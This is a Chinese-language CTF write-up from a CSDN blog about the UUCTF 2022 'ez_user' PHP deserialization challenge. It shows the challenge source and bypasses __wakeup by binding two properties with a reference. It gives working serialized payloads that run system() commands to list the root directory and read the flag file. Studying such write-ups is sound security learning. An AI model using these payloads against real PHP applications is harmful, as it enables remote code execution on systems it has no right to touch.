[UUCTF 2022]ez_user

最新推荐文章于 2024-05-16 10:23:18 发布
最新推荐文章于 2024-05-16 10:23:18 发布
阅读量248 收藏
点赞数
分类专栏: Web 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ShangYaoPaiGu/article/details/128228868
版权

0x01 题目

image-20221102230850974

0x02 解题

进入环境,获得源码:

<?php
show_source(__FILE__);

###very___so___easy!!!!
class test{
    public $a;
    public $b;
    public $c;
    public function __construct(){
        $this->a=1;
        $this->b=2;
        $this->c=3;
    }
    public function __wakeup(){
        $this->a='';
    }
    public function __destruct(){
        $this->b=$this->c;
        eval($this->a);
    }
}
$a=$_GET['a'];
if(!preg_match('/test":3/i',$a)){
    die("你输入的不正确!!!搞什么!!");
}
$bbb=unserialize($_GET['a']);
你输入的不正确!!!搞什么!!

审计源码,为php反序列化

这里首先想到的是利用CVE-2016-7124,后面发现不成功,看了下题目的环境:

image-20221102231137935

题目为PHP 5.6.28,而该漏洞利用的条件是

PHP5 <5.6.25

PHP7 < 7.0.10

那只能换一种思路。

题目中php函数的触发顺序为:

__construct() >> __wakeup() >> __destruct()

变量a在wakeup中被置空了,所以在__destruct()中想要执行提前构造好的a,只能利用

$this->b=$this->c;

这条语句,也就是将ba“链接”起来:

$this->a=&this->b;

这样在a被设置为空字符串之后,通过$this->b=$this->c;重新赋予我们构造好的命令进行执行。

构造代码如下:

<?php
class test{
		public $a;
		public $b;
		public $c;
		public function __construct(){
			$this->a = &$this->b;
			$this->c = "system('ls /');";
		}
	}
	$a=new test();
	echo serialize($a);
?>

传入参数a=

O:4:"test":3:{s:1:"a";N;s:1:"b";R:2;s:1:"c";s:15:"system('ls /');";}

得到:

bin boot dev etc fffffffffflagafag home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

flag文件为fffffffffflagafag

所以最终exp为:

<?php
class test{
		public $a;
		public $b;
		public $c;
		public function __construct(){
			$this->a = &$this->b;
			$this->c = "system('cat /fffffffffflagafag');";
		}
	}
	$a=new test();
	echo serialize($a);
?>

payload:

O:4:"test":3:{s:1:"a";N;s:1:"b";R:2;s:1:"c";s:33:"system('cat /fffffffffflagafag');";}
q1jun
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ez_setup.py下载
05-16
ez_setup.py下载
ez_setup.py
05-26
安装setuptools的脚本代码
Java-24第七章课后作业
Galaxy
10-28 222
1.程序中凡是可能出现异常的地方必须进行捕获或抛出”,这句话对吗 不对,异常分为RuntimeException和非Runtime异常 **RuntimeException或其子类:**程序方法可以对异常不做任何声明抛出或者处理,直接交给调用该方法的地方处理,程序能编译通过,不会对可能产生异常的代码行给出提示,例如空指针异常,main()方法没有进行任何声明与处理,会直接交给调用main()方法的Java虚拟机进行处理(隐式抛出),当异常发生时,虚拟机会根据异常的类型,产生相应的异常对象,程序中应对这些异常
centos7 systemd 开机自启动脚本配置方法 redis开机自启动
OceanWaves1993的博客
03-31 3329
centos7 systemd 开机自启动脚本配置方法 redis开机自启动
NSS [UUCTF 2022 新生赛]ez_unser
Jay17的博客
07-04 697
NSS [UUCTF 2022 新生赛]ez_unser
CTF之旅WEB篇(3)--ezunser PHP反序列化
shutTD的博客
10-01 1257
总的来说这道题思路还是很清晰的,是算偏易的题了不过新手拿来练手还是可以的逻辑很清晰,建议看完这篇文章后自己再试着做一遍哦!
2022 UUCTF Web
weixin_63231007的博客
12-19 2106
2022UUCTF web部分赛题分析
反序列化中_wakeup的绕过
rev1ve的博客
09-05 1480
反序列化中_wakeup扮演着非常重要的角色,ctf碰到很多的题目都有涉及到_wakeup绕过,写下这篇博客来总结下大部分绕过方法,其中会有例题具体演示。
[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce
weixin_46497491的博客
11-07 3706
[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce
打印机驱动 SW_EZ_V2.63p_b6
05-26
打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V...
ez_setup安装源码
01-09
安装ez_setup需要的py文件,支持win系统32位
[SWPUCTF 2022 新生赛]1z_unserialize和[SWPUCTF 2022 新生赛]ez_1zpo
m0_73700261的博客
04-26 744
得到以下payload=O:3:"lyh":3:{s:3:"url";s:3:"lly";以及这里有个wakeup的绕过,以及这里需要一个assert的函数不知道为啥要它,以及里边有一个md5的弱比较,绕过这三个就能够正常的命令执行了。[SWPUCTF 2022 新生赛]1z_unserialize。接着在另外给自己传参一个参数,在这个参数里做命令执行。[SWPUCTF 2022 新生赛]ez_1zpo。这个题目是一题很标准的反序列化,在根目录下边找到flag的文件。这个是构造的pop链。
DACTF—Ezunserialize
ro4lsc的博客
05-07 7467
DACTF—Ezunserialize(PHP反序列化字符逃逸) 这个题是我在赛后再进行学习的,所以自己在本地复现了一下环境。 <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function r...
2022 SWPU新生赛&HNCTF web部分题目
weixin_63231007的博客
11-02 3092
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行的命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php
[HUBUCTF 2022 新生赛]
zhhhb1005的博客
09-25 3077
这里卡在exp怎么写,后来详细了解了一下序列化和反序列化以后,再结合上面的isset( ),知道了username和password要用boolen类型,才写了出来。题目是想让我们做数学题,而且要速度介于1-3s之间,回答20个问题即可给出flag。函数 ,对于/a-zA-Z/这个正则表达式,我们可以利用PHP动态函数的特性,构造出字符串。先对代码进行审计,发现isset( )是我们没见过的用法,可以去了解一下。,$_GET['id']是通过get方法传过来的值。如果$_GET['id']没有被设置,则。
如何同步管理1000个设备的VLAN数据?
weixin_68261415的博客
05-15 733
为了方便VLAN的配置和维护,可在部门A和部门B内分别部署VCMP,管理域分别为VCMP1和VCMP2,并选择汇聚交换机AGG1作为VCMP1的Sever,接入交换机ACC1~ACC2作为VCMP1的Client,汇聚交换机AGG2作为VCMP2的Server,接入交换机ACC3~ACC4作为VCMP2的Client。这样,只需在汇聚或核心交换机上创建、删除VLAN或修改VLAN的名称、描述,同域内的接入交换机会同步修改,进而实现VLAN的集中管理,降低配置和维护的工作量。
php centos选择sqlserver的驱动和扩展选择版本的说明
Z.X的博客
05-14 442
2023年2月23日13:41:48首先是php php扩展 驱动 数据库的关系 官方文档说明: https://learn.microsoft.com/zh-cn/sql/connect/php/step-1-configure-development-environment-for-php-development?view=sql-server-2017https://learn.microsoft.com/zh-cn/sql/connect/php/system-requirements-for-th
FebHost:为什么企业需要注册保加利亚.BG域名?
最新发布
05-16 374
品牌本土化战略的实施同样离不开.BG域名的助力。拥有.BG域名的企业可以显著提高其在来自保加利亚的搜索请求中的可见度和排名,吸引更多的目标访问者,提升用户参与度。在当今全球化的商业环境中,对于与保加利亚市场息息相关的企业而言,选择合适的域名至关重要。面对日益饱和的通用顶级域名市场,.BG提供了一个具有区域特色的替代选择,帮助企业在保加利亚市场中树立一个鲜明且难忘的网络形象。综上所述,对于志在保加利亚市场塑造坚实网络地位的企业、组织或个人而言,.BG域名是一个明智且具有战略意义的选择,值得业界关注和利用。
等保测评实体分享three
ddcajdkdl的博客
05-16 925
它除了检测自身的主机以外,根本不检测网络上的情况,而且对入侵行为分析的工作量将随着主机数量的增加而增加,因此全面部署主机入侵检测系统代价比较大,企业很难将所有主机用主机入侵检测系统保护,只能选择部分主机进行保护,那些未安装主机入侵检测系统的机器将成为保护的盲点,入侵者可利用这些机器达到攻击的目标。NIDS一般部署在比较重要的网段内,它不需要改变服务器等主机的配置,由于它不会在业务系统的主机中安装额外的软件,从而不会影响这些机器的CPU、I/O与磁盘等资源的使用,不会影响业务系统的性能。
[HNCTF 2022 WEEK2]ez_ssrf
07-27
\[HNCTF 2022 WEEK2\]ez_ssrf是一个题目或挑战的名称,它涉及到SSRF(Server-Side Request Forgery)攻击。在这个挑战中,通过构造恶意的请求,攻击者可以利用目标服务器发起未经授权的请求,可能导致信息泄露、远程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值